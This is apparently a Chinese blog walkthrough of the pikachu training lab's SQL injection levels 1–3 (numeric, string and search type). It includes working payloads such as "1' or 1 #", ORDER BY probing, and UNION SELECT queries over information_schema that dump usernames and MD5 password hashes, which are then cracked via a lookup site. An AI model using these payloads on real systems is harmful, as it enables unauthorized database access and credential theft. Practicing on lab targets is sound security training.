C/C++教程

pikachu靶场之SQL注入(1-3)

本文主要是介绍pikachu靶场之SQL注入(1-3),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

pikachu靶场之SQL注入(1-3)

1.数字型注入

看题目知道了第一题是数字型注入,下拉框选择,抓个包试试,看来是post,这里我用的是burp。

方便测试,放到repeater里面。

先试一试出列表1 or 1 --+,出结果了。

order by试出来了是2,然后是union select看回显。

然后按流程来,查库,查表,查字段。

select group_concat(schema_name) from information_schema.schemata
select group_concat(table_name) from information_schema.tables where table_schema='pikachu'
select group_concat(column_name) from information_schema.columns where table_name='users'
select group_concat(username) from pikachu.users
select group_concat(password) from pikachu.users


发现密码是md5加密的,直接上cmd5查就好啦。

2.字符型注入

首先试了1',发现报错信息了。然后1' or 1 #,发现出结果了。

后面和第一个数值型一样了,先order by,然后union select,然后查库、查表、查字段、查值。

这里就不赘述了。

3.搜索型注入

先试了a',报错了,然后是a' or 1#,出结果了。

然后又和上面一样了,a' union select (select group_concat(column_name) from information_schema.columns where table_name='users'),(select group_concat(username) from pikachu.users),(select group_concat(password) from pikachu.users)#这里不说了。放一张结果图吧。

这篇关于pikachu靶场之SQL注入(1-3)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!